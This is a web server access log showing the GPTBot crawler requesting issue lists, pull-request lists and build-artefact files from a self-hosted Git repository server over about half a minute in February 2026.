"/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11362] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11364] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11364] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11363] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11363] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=source" [Client 74.7.227.38] [Length 13953] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=source" [Client 74.7.227.38] [Length 13953] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=source" [Client 74.7.227.38] [Length 13924] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=rendered" [Client 74.7.227.38] [Length 10992] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:19:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:43:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[17/Feb/2026:19:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[17/Feb/2026:19:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 14350] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[17/Feb/2026:19:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[17/Feb/2026:19:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig?display=rendered" [Client 74.7.227.38] [Length 11243] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:19:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 23526] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:19:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 22606] [Gzip 11.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:19:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" -[17/Feb/2026:19:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:19:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" -[17/Feb/2026:19:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" 